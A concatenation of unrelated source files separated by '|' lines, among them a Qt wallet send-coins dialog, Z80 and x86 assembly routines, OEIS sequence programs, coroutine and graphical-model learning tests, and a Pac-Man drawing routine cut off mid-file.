coinControlUpdateLabels();
}
void SendCoinsDialog::processSendCoinsReturn(const WalletModel::SendCoinsReturn& sendCoinsReturn, const QString& msgArg, bool fPrepare)
{
bool fAskForUnlock = false;
QPair<QString, CClientUIInterface::MessageBoxFlags> msgParams;
// Default to a warning message, override if error message is needed
msgParams.second = CClientUIInterface::MSG_WARNING;
// This comment is specific to SendCoinsDialog usage of WalletModel::SendCoinsReturn.
// WalletModel::TransactionCommitFailed is used only in WalletModel::sendCoins()
// all others are used only in WalletModel::prepareTransaction()
switch (sendCoinsReturn.status) {
case WalletModel::InvalidAddress:
msgParams.first = tr("The recipient address is not valid, please recheck.");
break;
case WalletModel::InvalidAmount:
msgParams.first = tr("The amount to pay must be larger than 0.");
break;
case WalletModel::AmountExceedsBalance:
msgParams.first = tr("The amount exceeds your balance.");
break;
case WalletModel::AmountWithFeeExceedsBalance:
msgParams.first = tr("The total exceeds your balance when the %1 transaction fee is included.").arg(msgArg);
break;
case WalletModel::DuplicateAddress:
msgParams.first = tr("Duplicate address found, can only send to each address once per send operation.");
break;
case WalletModel::TransactionCreationFailed:
msgParams.first = tr("Transaction creation failed!");
msgParams.second = CClientUIInterface::MSG_ERROR;
break;
case WalletModel::TransactionCommitFailed:
msgParams.first = tr("The transaction was rejected! This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.");
msgParams.second = CClientUIInterface::MSG_ERROR;
break;
case WalletModel::InsaneFee:
msgParams.first = tr("A fee %1 times higher than %2 per kB is considered an insanely high fee.").arg(10000).arg(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), ::minRelayTxFee.GetFeePerK()));
break;
// included to prevent a compiler warning.
case WalletModel::OK:
default:
return;
}
// Unlock wallet if it wasn't fully unlocked already
if(fAskForUnlock) {
model->requestUnlock(AskPassphraseDialog::Context::Unlock_Full, false);
if(model->getEncryptionStatus () != WalletModel::Unlocked) {
msgParams.first = tr("Error: The wallet was unlocked only to anonymize coins. Unlock canceled.");
}
else {
// Wallet unlocked
return;
}
}
emit message(tr("Send Coins"), msgParams.first, msgParams.second);
}
void SendCoinsDialog::minimizeFeeSection(bool fMinimize)
{
ui->labelFeeMinimized->setVisible(fMinimize);
ui->buttonChooseFee->setVisible(fMinimize);
ui->buttonMinimizeFee->setVisible(!fMinimize);
ui->frameFeeSelection->setVisible(!fMinimize);
ui->horizontalLayoutSmartFee->setContentsMargins(0, (fMinimize ? 0 : 6), 0, 0);
fFeeMinimized = fMinimize;
}
void SendCoinsDialog::on_buttonChooseFee_clicked()
{
minimizeFeeSection(false);
}
void SendCoinsDialog::on_buttonMinimizeFee_clicked()
{
updateFeeMinimizedLabel();
minimizeFeeSection(true);
}
void SendCoinsDialog::setMinimumFee()
{
ui->radioCustomPerKilobyte->setChecked(true);
ui->customFee->setValue(CWallet::minTxFee.GetFeePerK());
}
void SendCoinsDialog::updateFeeSectionControls()
{
ui->sliderSmartFee->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFee->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFee2->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFee3->setEnabled(ui->radioSmartFee->isChecked());
ui->labelFeeEstimation->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFeeNormal->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFeeFast->setEnabled(ui->radioSmartFee->isChecked());
ui->checkBoxMinimumFee->setEnabled(ui->radioCustomFee->isChecked());
ui->labelMinFeeWarning->setEnabled(ui->radioCustomFee->isChecked());
ui->radioCustomPerKilobyte->setEnabled(ui->radioCustomFee->isChecked() && !ui->checkBoxMinimumFee->isChecked());
ui->radioCustomAtLeast->setEnabled(ui->radioCustomFee->isChecked() && !ui->checkBoxMinimumFee->isChecked());
ui->customFee->setEnabled(ui->radioCustomFee->isChecked() && !ui->checkBoxMinimumFee->isChecked());
}
void SendCoinsDialog::updateGlobalFeeVariables()
{
if (ui->radioSmartFee->isChecked()) {
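// the slider value (clamped to 0..24) maps inversely to a confirmation target of 25..1 blocks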
nTxConfirmTarget = (int)25 - (int)std::max(0, std::min(24, ui->sliderSmartFee->value()));
payTxFee = CFeeRate(0);
} else {
nTxConfirmTarget = 25;
payTxFee = CFeeRate(ui->customFee->value());
fPayAtLeastCustomFee = ui->radioCustomAtLeast->isChecked();
}
fSendFreeTransactions = ui->checkBoxFreeTx->isChecked();
}
void SendCoinsDialog::updateFeeMinimizedLabel()
{
if (!model || !model->getOptionsModel())
return;
if (ui->radioSmartFee->isChecked())
ui->labelFeeMinimized->setText(ui->labelSmartFee->text());
else {
ui->labelFeeMinimized->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), ui->customFee->value()) +
((ui->radioCustomPerKilobyte->isChecked()) ? "/kB" : ""));
}
}
void SendCoinsDialog::updateMinFeeLabel()
{
if (model && model->getOptionsModel())
ui->checkBoxMinimumFee->setText(tr("Pay only the minimum fee of %1").arg(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), CWallet::minTxFee.GetFeePerK()) + "/kB"));
}
void SendCoinsDialog::updateSmartFeeLabel()
{
if (!model || !model->getOptionsModel())
return;
int nBlocksToConfirm = (int)25 - (int)std::max(0, std::min(24, ui->sliderSmartFee->value()));
CFeeRate feeRate = mempool.estimateFee(nBlocksToConfirm);
if (feeRate <= CFeeRate(0)) // not enough data => minfee
{
ui->labelSmartFee->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), CWallet::minTxFee.GetFeePerK()) + "/kB");
ui->labelSmartFee2->show(); // (Smart fee not initialized yet. This usually takes a few blocks...)
ui->labelFeeEstimation->setText("");
} else {
ui->labelSmartFee->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), feeRate.GetFeePerK()) + "/kB");
ui->labelSmartFee2->hide();
ui->labelFeeEstimation->setText(tr("Estimated to begin confirmation within %n block(s).", "", nBlocksToConfirm));
}
updateFeeMinimizedLabel();
}
// UTXO splitter
void SendCoinsDialog::splitBlockChecked(int state)
{
if (model) {
CoinControlDialog::coinControl->fSplitBlock = (state == Qt::Checked);
fSplitBlock = (state == Qt::Checked);
ui->splitBlockLineEdit->setEnabled((state == Qt::Checked));
ui->labelBlockSizeText->setEnabled((state == Qt::Checked));
ui->labelBlockSize->setEnabled((state == Qt::Checked));
coinControlUpdateLabels();
}
}
//UTXO splitter
void SendCoinsDialog::splitBlockLineEditChanged(const QString& text)
{
//grab the amount in the Coin Control After Fee field
QString qAfterFee = ui->labelCoinControlAfterFee->text().left(ui->labelCoinControlAfterFee->text().indexOf(" ")).replace("~", "").simplified().replace(" ", "");
//convert to CAmount
CAmount nAfterFee;
ParseMoney(qAfterFee.toStdString().c_str(), nAfterFee);
//if greater than 0 then divide after fee by the amount of blocks
CAmount nSize = nAfterFee;
int nBlocks = text.toInt();
if (nAfterFee && nBlocks)
nSize = nAfterFee / nBlocks;
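// e.g. an after-fee total of 100 split across 4 blocks yields outputs of 25 each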
//assign to the split block dummy, which is used to recalculate the fee for the extra outputs
CoinControlDialog::nSplitBlockDummy = nBlocks;
//update labels
ui->labelBlockSize->setText(QString::fromStdString(FormatMoney(nSize)));
coinControlUpdateLabels();
}
// Coin Control: copy label "Quantity" to clipboard
void SendCoinsDialog::coinControlClipboardQuantity()
{
GUIUtil::setClipboard(ui->labelCoinControlQuantity->text());
}
// Coin Control: copy label "Amount" to clipboard
void SendCoinsDialog::coinControlClipboardAmount()
{
GUIUtil::setClipboard(ui->labelCoinControlAmount->text().left(ui->labelCoinControlAmount->text().indexOf(" ")));
}
// Coin Control: copy label "Fee" to clipboard
void SendCoinsDialog::coinControlClipboardFee()
{
GUIUtil::setClipboard(ui->labelCoinControlFee->text().left(ui->labelCoinControlFee->text().indexOf(" ")).replace("~", ""));
}
// Coin Control: copy label "After fee" to clipboard
void SendCoinsDialog::coinControlClipboardAfterFee()
{
GUIUtil::setClipboard(ui->labelCoinControlAfterFee->text().left(ui->labelCoinControlAfterFee->text().indexOf(" ")).replace("~", ""));
}
// Coin Control: copy label "Bytes" to clipboard
void SendCoinsDialog::coinControlClipboardBytes()
{
GUIUtil::setClipboard(ui->labelCoinControlBytes->text().replace("~", ""));
}
// Coin Control: copy label "Priority" to clipboard
void SendCoinsDialog::coinControlClipboardPriority()
{
GUIUtil::setClipboard(ui->labelCoinControlPriority->text());
}
// Coin Control: copy label "Dust" to clipboard
void SendCoinsDialog::coinControlClipboardLowOutput()
{
GUIUtil::setClipboard(ui->labelCoinControlLowOutput->text());
}
// Coin Control: copy label "Change" to clipboard
void SendCoinsDialog::coinControlClipboardChange()
{
GUIUtil::setClipboard(ui->labelCoinControlChange->text().left(ui->labelCoinControlChange->text().indexOf(" ")).replace("~", ""));
}
// Coin Control: settings menu - coin control enabled/disabled by user
void SendCoinsDialog::coinControlFeatureChanged(bool checked)
{
ui->frameCoinControl->setVisible(checked);
if (!checked && model) // coin control features disabled
CoinControlDialog::coinControl->SetNull();
if (checked)
coinControlUpdateLabels();
}
// Coin Control: button inputs -> show actual coin control dialog
void SendCoinsDialog::coinControlButtonClicked()
{
CoinControlDialog dlg;
dlg.setModel(model);
dlg.exec();
coinControlUpdateLabels();
}
// Coin Control: checkbox custom change address
void SendCoinsDialog::coinControlChangeChecked(int state)
{
if (state == Qt::Unchecked) {
CoinControlDialog::coinControl->destChange = CNoDestination();
ui->labelCoinControlChangeLabel->clear();
} else
// use this to re-validate an already entered address
coinControlChangeEdited(ui->lineEditCoinControlChange->text());
ui->lineEditCoinControlChange->setEnabled((state == Qt::Checked));
}
// Coin Control: custom change address changed
void SendCoinsDialog::coinControlChangeEdited(const QString& text)
{
if (model && model->getAddressTableModel()) {
// Default to no change address until verified
CoinControlDialog::coinControl->destChange = CNoDestination();
ui->labelCoinControlChangeLabel->setStyleSheet("QLabel{color:red;}");
CBitcoinAddress addr = CBitcoinAddress(text.toStdString());
if (text.isEmpty()) // Nothing entered
{
ui->labelCoinControlChangeLabel->setText("");
} else if (!addr.IsValid()) // Invalid address
{
ui->labelCoinControlChangeLabel->setText(tr("Warning: Invalid SKWX address"));
} else // Valid address
{
CPubKey pubkey;
CKeyID keyid;
addr.GetKeyID(keyid);
if (!model->getPubKey(keyid, pubkey)) // Unknown change address
{
ui->labelCoinControlChangeLabel->setText(tr("Warning: Unknown change address"));
} else // Known change address
{
ui->labelCoinControlChangeLabel->setStyleSheet("QLabel{color:black;}");
// Query label
QString associatedLabel = model->getAddressTableModel()->labelForAddress(text);
if (!associatedLabel.isEmpty())
ui->labelCoinControlChangeLabel->setText(associatedLabel);
else
ui->labelCoinControlChangeLabel->setText(tr("(no label)"));
CoinControlDialog::coinControl->destChange = addr.Get();
}
}
}
}
// Coin Control: update labels
void SendCoinsDialog::coinControlUpdateLabels()
{
if (!model || !model->getOptionsModel() || !model->getOptionsModel()->getCoinControlFeatures())
return;
// set pay amounts
CoinControlDialog::payAmounts.clear();
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
if (entry)
CoinControlDialog::payAmounts.append(entry->getValue().amount);
}
if (CoinControlDialog::coinControl->HasSelected()) {
// actual coin control calculation
CoinControlDialog::updateLabels(model, this);
// show coin control stats
ui->labelCoinControlAutomaticallySelected->hide();
ui->widgetCoinControl->show();
} else {
// hide coin control stats
ui->labelCoinControlAutomaticallySelected->show();
ui->widgetCoinControl->hide();
ui->labelCoinControlInsuffFunds->hide();
}
}
|
INCLUDE "graphics/grafix.inc"
SECTION code_clib
PUBLIC xorborder
PUBLIC _xorborder
EXTERN w_pixeladdress
; EXTERN l_cmp
;
; $Id: xorborder.asm,v 1.6 2016/10/13 06:32:03 stefano Exp $
;
; ***********************************************************************
;
; drawbox Timex hires version
;
.xorborder
._xorborder
push ix ;save caller's ix
ld ix,2
add ix,sp
ld l,(ix+8)
ld h,(ix+9); x
ld a,1
cp h
jr c,xorborder_exit
ld e,(ix+6); y
ld a,maxy
cp e
jr c,xorborder_exit
; left vertical
call pixel_addr
call vertical
; right vertical line
ld l,(ix+8)
ld h,(ix+9); x
ld c,(ix+4)
ld b,(ix+5); width
add hl,bc
ld a,1
cp h
jr c,next
ld e,(ix+6)
call pixel_addr
call vertical
.next
; upper horizontal line
ld l,(ix+8)
ld h,(ix+9) ; x
ld e,(ix+6) ; y
call pixel_addr
call horizontal
; bottom horizontal line
ld l,(ix+8)
ld h,(ix+9) ; x
ld e,(ix+6) ; y
ld a,(ix+2);height
add e
ld e,a
pop af
call pixel_addr
.horizontal
ld c,(ix+4)
ld b,(ix+5) ; width
.loop3
ld a,(de)
xor (hl)
ld (de),a
call incx
jr c,xorborder_exit
ld a,b
or c
ret z
dec bc
jr loop3
.xorborder_exit
pop ix ;restore caller's ix
ret
; (hl) mask
; de - screen address
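; step one pixel right: rotate the mask; when it wraps, alternate between
; the two Timex hires display files (bit 5 of d) before moving to the next column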
.incx
rrc (hl)
ret nc
bit 5,d
jr nz,first
set 5,d
or a
ret
.first
res 5,d
inc e
ld a,e
and $1f
ret nz
scf
ret
.incy
inc d
ld a,d
and $07
ret nz
ld a,d
sub $08
ld d,a
ld a,e
add a,$20
ld e,a
ret nc
ld a,d
add a,$08
ld d,a
and 95
cp $58
ccf
ret
.pixel_addr
ld d,0
call w_pixeladdress
ld b,a
ld a,1
jr z,getout; pixel is at bit 0...
.loop1
rlca
djnz loop1
.getout
ld (PIXEL),a
ld hl,PIXEL
ret
.vertical
; vertical line
ld b,(ix+2) ; height
.loop2
ld a,(de)
xor (hl)
ld (de),a
call incy
ret c
djnz loop2
ret
SECTION bss_clib
.PIXEL
DEFB 0
|
; A061774: a(n) = (n-1)!, as n runs through the prime powers >= 1.
; Submitted by Christian Krause
; 1,1,2,6,24,720,5040,40320,3628800,479001600,1307674368000,20922789888000,6402373705728000,1124000727777607680000,620448401733239439360000,403291461126605635584000000,304888344611713860501504000000,265252859812191058636308480000000,8222838654177922817725562880000000
seq $0,181062 ; Prime powers minus 1.
seq $0,142 ; Factorial numbers: n! = 1*2*3*4*...*n (order of symmetric group S_n, number of permutations of n letters).
|
//
// Created by tao on 19-1-17.
//
#include "common_includes.h"
#include <iostream>
#include <libgo.h>
#include <stdio.h>
#include <thread>
void foo()
{
printf("function pointer\n");
}
struct A {
void fA() { printf("std::bind\n"); }
void fB() { printf("std::function\n"); }
};
int lib_go_main()
{
//----------------------------------
// Use the keyword `go` to create a coroutine. `go` may be followed by:
// 1. a void(*)() function pointer, e.g. foo.
// 2. a parameterless lambda, std::bind object, or std::function object,
// 3. or any functor object that can be called with no arguments.
// Don't forget the trailing semicolon ";".
go foo;
go []{
printf("lambda\n");
};
go std::bind(&A::fA, A());
std::function<void()> fn(std::bind(&A::fB, A()));
go fn;
// co_stack can be used to create a coroutine with a specified stack size.
// Create a coroutine with a large 10MB stack:
go co_stack(10 * 1024 * 1024) []{
printf("large stack\n");
};
// A coroutine does not run right after creation; it is queued in the
// runnable list and waits for the scheduler to dispatch it.
// co_sched is the default coroutine scheduler; user-created schedulers
// may be used as well.
// When only one thread drives the scheduler, coroutines run strictly in
// creation order.
// Schedule coroutines with the main thread only:
// co_sched.Start();
// The following uses as many scheduler threads as there are CPU cores
// (including the main thread):
// co_sched.Start(0);
// The following lets the scheduler grow its thread pool freely, up to 1024.
// When a thread is blocked by a coroutine, the scheduler starts a new
// thread, so the number of available threads always equals Start's first
// argument (0 means the CPU core count):
// co_sched.Start(0, 1024);
// If you don't want the scheduler to block the main thread, use this:
std::thread t([]{ co_sched.Start(); });
t.detach();
co_sleep(100);
//----------------------------------
//----------------------------------
// Besides the default scheduler used above, extra schedulers can be
// created; a coroutine is only ever scheduled by the scheduler it belongs
// to, so extra schedulers can isolate different workloads.
// Create a scheduler
co::Scheduler* sched = co::Scheduler::Create();
// Start 4 threads to run the newly created scheduler
std::thread t2([sched]{ sched->Start(4); });
t2.detach();
// Create a coroutine on the newly created scheduler
go co_scheduler(sched) []{
printf("run in my scheduler.\n");
};
co_sleep(100);
return 0;
}
TEST(test_test, 1) {
EXPECT_EQ(1, 1);
}
int main(int argc, char **argv) {
int iRet = 0;
iRet = beforeRun();
if(iRet){
std::cerr<<"init failed with "<<iRet<<std::endl;
}
lib_go_main();
testing::InitGoogleTest(&argc,argv);
iRet = RUN_ALL_TESTS();
return iRet;
} |
// This is an open source non-commercial project. Dear PVS-Studio, please check it.
// PVS-Studio Static Code Analyzer for C, C++ and C#: http://www.viva64.com
#include "GameOverDialog.h"
#include "../Constants.h"
#include "../FontManager.h"
#include "NAS2D/Utility.h"
#include "NAS2D/Renderer/Renderer.h"
using namespace NAS2D;
GameOverDialog::GameOverDialog() : mHeader("ui/interface/game_over.png")
{
init();
}
GameOverDialog::~GameOverDialog()
{}
void GameOverDialog::init()
{
position(0, 0);
size(522, 340);
add(&btnClose, 5, 310);
btnClose.text("Return to Main Menu");
btnClose.size(512, 25);
btnClose.click().connect(this, &GameOverDialog::btnCloseClicked);
anchored(true);
}
void GameOverDialog::btnCloseClicked()
{
mCallback();
}
void GameOverDialog::update()
{
if (!visible()) { return; }
Window::update();
Renderer& r = Utility<Renderer>::get();
r.drawImage(mHeader, rect().x() + 5, rect().y() + 25);
// Yeah, I know. I hate it too but it made more sense than holding onto a static pointer.
r.drawText( *Utility<FontManager>::get().font(constants::FONT_PRIMARY, constants::FONT_PRIMARY_NORMAL),
"You have failed. Your colony is dead.", rect().x() + 5, rect().y() + 290, 255, 255, 255);
}
|
; the basic name definitions for soundfile et al v. 1.00 (c) 2012 W. Lenerz
section sound
include 'dev8_mac_proc'
xdef snd_nam
section procs
snd_nam lea procs,a1
move.w $110,a2
jmp (a2)
procs
proc_stt
proc_def SOUNDFILE
proc_def SOUNDFILE2
proc_def SOUNDFILE3
proc_def SETRATE10
proc_def SETRATE20
proc_def SOUNDSAMPLE2
proc_def SOUNDSAMPLE3
proc_def KILLSOUND
proc_def JVAVOL
proc_def JVA_VOL,jvavol
proc_end
proc_stt
proc_def SOUNDSAMPLE
proc_end
end
|
dnl AMD64 mpn_mul_2 optimised for Intel Sandy Bridge.
dnl Contributed to the GNU project by Torbjörn Granlund.
dnl Copyright 2003-2005, 2007, 2008, 2011-2013 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of either:
dnl
dnl * the GNU Lesser General Public License as published by the Free
dnl Software Foundation; either version 3 of the License, or (at your
dnl option) any later version.
dnl
dnl or
dnl
dnl * the GNU General Public License as published by the Free Software
dnl Foundation; either version 2 of the License, or (at your option) any
dnl later version.
dnl
dnl or both in parallel, as here.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful, but
dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
dnl for more details.
dnl
dnl You should have received copies of the GNU General Public License and the
dnl GNU Lesser General Public License along with the GNU MP Library. If not,
dnl see https://www.gnu.org/licenses/.
include(`../config.m4')
C cycles/limb best
C AMD K8,K9
C AMD K10
C AMD bull
C AMD pile
C AMD bobcat
C AMD jaguar
C Intel P4
C Intel core
C Intel NHM
C Intel SBR 2.57 2.52 using 4-way code
C Intel IBR 2.35 2.32 using 4-way code
C Intel HWL 2.02 1.86
C Intel BWL
C Intel atom
C VIA nano
C This code is the result of running a code generation and optimisation tool
C suite written by David Harvey and Torbjorn Granlund.
C When playing with pointers, set this to $2 to fall back to conservative
C indexing in wind-down code.
define(`I',`$1')
define(`rp', `%rdi') C rcx
define(`up', `%rsi') C rdx
define(`n_param', `%rdx') C r8
define(`vp', `%rcx') C r9
define(`n', `%rcx')
define(`v0', `%rbx')
define(`v1', `%rbp')
define(`w0', `%r8')
define(`w1', `%r9')
define(`w2', `%r10')
define(`w3', `%r11')
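C The main loop is 2-way unrolled; w0-w3 rotate as accumulators that carry
C partial products across iterations.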
ABI_SUPPORT(DOS64)
ABI_SUPPORT(STD64)
ASM_START()
TEXT
ALIGN(32)
PROLOGUE(mpn_mul_2)
FUNC_ENTRY(4)
push %rbx
push %rbp
mov (vp), v0
mov 8(vp), v1
mov (up), %rax
lea (up,n_param,8), up
lea (rp,n_param,8), rp
test $1, R8(n_param)
jnz L(b1)
L(b0): mov $0, R32(n)
sub n_param, n
xor w0, w0
mul v0
mov %rax, w2
mov %rdx, w1
mov (up,n,8), %rax
jmp L(lo0)
L(b1): mov $1, R32(n)
sub n_param, n
xor w2, w2
mul v0
mov %rax, w0
mov %rdx, w3
mov -8(up,n,8), %rax
mul v1
jmp L(lo1)
ALIGN(32)
L(top): mul v0
add %rax, w0 C 1
mov %rdx, w3 C 2
adc $0, w3 C 2
mov -8(up,n,8), %rax
mul v1
add w1, w0 C 1
adc $0, w3 C 2
L(lo1): add %rax, w2 C 2
mov w0, -8(rp,n,8) C 1
mov %rdx, w0 C 3
adc $0, w0 C 3
mov (up,n,8), %rax
mul v0
add %rax, w2 C 2
mov %rdx, w1 C 3
adc $0, w1 C 3
add w3, w2 C 2
mov (up,n,8), %rax
adc $0, w1 C 1
L(lo0): mul v1
mov w2, (rp,n,8) C 2
add %rax, w0 C 3
mov %rdx, w2 C 4
mov 8(up,n,8), %rax
adc $0, w2 C 4
add $2, n
jnc L(top)
L(end): mul v0
add %rax, w0
mov %rdx, w3
adc $0, w3
mov I(-8(up),-8(up,n,8)), %rax
mul v1
add w1, w0
adc $0, w3
add %rax, w2
mov w0, I(-8(rp),-8(rp,n,8))
adc $0, %rdx
add w3, w2
mov w2, I((rp),(rp,n,8))
adc $0, %rdx
mov %rdx, %rax
pop %rbp
pop %rbx
FUNC_EXIT()
ret
EPILOGUE()
|
;------------------------------------------------------------------------------
;
; Copyright (c) 2006 - 2016, Intel Corporation. All rights reserved.<BR>
; SPDX-License-Identifier: BSD-2-Clause-Patent
;
; Module Name:
;
; InterlockedIncrement.Asm
;
; Abstract:
;
; InterlockedIncrement function
;
; Notes:
;
;------------------------------------------------------------------------------
SECTION .text
;------------------------------------------------------------------------------
; UINT32
; EFIAPI
; InternalSyncIncrement (
; IN volatile UINT32 *Value
; );
;------------------------------------------------------------------------------
global ASM_PFX(InternalSyncIncrement)
ASM_PFX(InternalSyncIncrement):
mov ecx, [esp + 4]
mov eax, 1
lock xadd dword [ecx], eax
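; xadd leaves the pre-increment value in eax; inc produces the new value to return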
inc eax
ret
|
segment .data
fmt_out: db "The sum is: %lld", 10, 0
fmt: db "%s", 10, 0
fmt_in: db "%lld", 0
a: dq 0
b: dq 0
segment .text
global main
extern printf
extern scanf
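; System V AMD64 ABI: integer arguments go in RDI, RSI, ...; for variadic
; calls like printf/scanf, RAX holds the number of vector registers used (0 here)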
print_function:
push RBP
mov RBP, RSP
mov RAX, [RBP + 16]
mov RBX, [RBP + 24]
add RAX, RBX
mov [a], RAX
mov RAX, 0
mov RBX, 0
mov RDI, fmt_out
mov RSI, [a]
call printf
pop RBP
ret
main:
push RBP
mov RBP, RSP
mov RAX, 0
mov RBX, 0
mov RCX, 0
mov RDI, fmt_in
mov RSI, a
call scanf
mov RAX, 0
mov RBX, 0
mov RCX, 0
mov RDI, fmt_in
mov RSI, b
call scanf
mov RAX, [a]
push RAX
mov RAX, [b]
push RAX
call print_function
pop RAX
pop RAX
mov RAX, 0
pop RBP
ret
|
#include <vector>
#include <opengm/functions/explicit_function.hxx>
#include <opengm/unittests/test.hxx>
#include <opengm/graphicalmodel/graphicalmodel.hxx>
#include <opengm/operations/adder.hxx>
#include <opengm/operations/minimizer.hxx>
#include <opengm/inference/icm.hxx>
#include <opengm/utilities/metaprogramming.hxx>
#include <opengm/functions/learnable/lpotts.hxx>
#include <opengm/functions/learnable/lweightedsum_of_functions.hxx>
//#include <opengm/learning/maximum-likelihood-learning.hxx>
#include <opengm/learning/maximum_likelihood_learning.hxx>
#include <opengm/learning/loss/hammingloss.hxx>
#include <opengm/learning/dataset/testdatasets.hxx>
//*************************************
typedef double ValueType;
typedef size_t IndexType;
typedef size_t LabelType;
typedef opengm::meta::TypeListGenerator<
opengm::ExplicitFunction<ValueType,IndexType,LabelType>,
opengm::functions::learnable::LPotts<ValueType,IndexType,LabelType>,
opengm::functions::learnable::LWeightedSumOfFunctions<ValueType,IndexType,LabelType>
>::type FunctionListType;
typedef opengm::GraphicalModel<
ValueType,opengm::Adder,
FunctionListType,
opengm::DiscreteSpace<IndexType,LabelType>
> GM;
typedef opengm::learning::HammingLoss LOSS;
typedef opengm::datasets::TestDataset0<GM,LOSS> DS0;
typedef opengm::datasets::TestDataset1<GM,LOSS> DS1;
typedef opengm::datasets::TestDataset2<GM,LOSS> DS2;
typedef opengm::datasets::TestDatasetSimple<GM,LOSS> DSSimple;
typedef opengm::ICM<GM,opengm::Minimizer> INF;
typedef opengm::BeliefPropagationUpdateRules<GM, opengm::Integrator> UpdateRules;
typedef opengm::MessagePassing<GM, opengm::Integrator, UpdateRules, opengm::MaxDistance> BeliefPropagation;
//*************************************
int main() {
std::cout << " Includes are fine :-) " << std::endl;
/*
{
DS0 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS0,LOSS>::Weight weight;
opengm::learning::MaximumLikelihoodLearner<DS0,LOSS> learner(dataset,weight);
INF::Parameter infWeight;
learner.learn<INF>(infWeight);
}
*/
{
DS1 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS1>::Parameter parameter;
parameter.maximumNumberOfIterations_ = 15;
parameter.gradientStepSize_ = 0.1;
parameter.weightStoppingCriteria_ = 0.001;
parameter.gradientStoppingCriteria_ = 0.00000000001;
parameter.infoFlag_ = true;
parameter.infoEveryStep_ = true;
parameter.weightRegularizer_ = 1.0;
parameter.beliefPropagationMaximumNumberOfIterations_ = 5;
parameter.beliefPropagationConvergenceBound_ = 0.0001;
parameter.beliefPropagationDamping_ = 0.5;
parameter.beliefPropagationTemperature_ = 0.3;
parameter.beliefPropagationIsAcyclic_ = opengm::Tribool(opengm::Tribool::Maybe);
opengm::learning::MaximumLikelihoodLearner<DS1> learner(dataset,parameter);
learner.learn();
}
{
DS2 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS2>::Parameter parameter;
parameter.maximumNumberOfIterations_ = 15;
parameter.gradientStepSize_ = 0.1;
parameter.weightStoppingCriteria_ = 0.001;
parameter.gradientStoppingCriteria_ = 0.00000000001;
parameter.infoFlag_ = true;
parameter.infoEveryStep_ = true;
parameter.weightRegularizer_ = 1.0;
parameter.beliefPropagationMaximumNumberOfIterations_ = 5;
parameter.beliefPropagationConvergenceBound_ = 0.0001;
parameter.beliefPropagationDamping_ = 0.5;
parameter.beliefPropagationTemperature_ = 0.3;
parameter.beliefPropagationIsAcyclic_ = opengm::Tribool(opengm::Tribool::Maybe);
opengm::learning::MaximumLikelihoodLearner<DS2> learner(dataset,parameter);
learner.learn();
}
/*
{
DS2 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS2,LOSS>::Weight weight;
opengm::learning::MaximumLikelihoodLearner<DS2,LOSS> learner(dataset,weight);
INF::Parameter infWeight;
learner.learn<INF>(infWeight);
}
*/
/*
{
DSSimple dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DSSimple,LOSS>::Weight weight;
opengm::learning::MaximumLikelihoodLearner<DSSimple,LOSS> learner(dataset,weight);
INF::Parameter infWeight;
learner.learn<INF>(infWeight);
}
*/
}
|
; A135172: a(n) = 3^prime(n) + 2^prime(n).
; 13,35,275,2315,179195,1602515,129271235,1162785755,94151567435,68630914235795,617675543767595,450284043329950835,36472998576194041955,328256976190630099835,26588814499694991643115,19383245676687219151537715,14130386092315195257068234555,127173474827954453552096993555,92709463148045411038351601823515,7509466514982085987188150780864395,67585198634826967968486182914745315
seq $0,40 ; The prime numbers.
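; $0 holds prime(n) after the seq call; compute $1 = 3^prime(n) and $2 = 2^prime(n), then a(n) = $1 + $2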
mov $1,3
pow $1,$0
mov $2,2
pow $2,$0
add $1,$2
mov $0,$1
|
//pacman's draw glyph
//
// if opentimer == 1
// load open timer
// open timer in 65511
//storing r1 in
LUI 255 r1
ORI 231 r1
LOAD r1 r1
//check to see if is 1
CMPI 1 r1
//check condition code
BNE AFTER_MOUTH_TOGGLE
//if timer is 1, invert the mouth condition
//get the value of the mouth condition
//r2 has the mouth condition address
LUI 51 r2
ORI 146 r2
LOAD r3 r2
MULTI -1 r3
//store back in memory
STOR r3 r2
AFTER_MOUTH_TOGGLE:
//APPARENTLY R3 IS USED LATER
//I'M MOVING THE MOUTH POSITION TO R4...
MOV R3 R4
//MAKE PACMAN LOCATION ADDRESS IN r2
LUI 51 r2
ORI 144 r2
//MAKE PACMAN STATE ADDRESS IN r3
LUI 51 r3
ORI 145 r3
//load location of pacman INTO r0
LOAD r0 r2
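//state codes tested below: 16-19 = UP0-3, 32-35 = DOWN0-3, 48-51 = LEFT0-3,
//64-67 = RIGHT0-3, 1-3 = DEAD1-3; anything else falls through to DEAD4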
//CHECK IF STATE UP0
drawUP0:
LOAD r0 r3
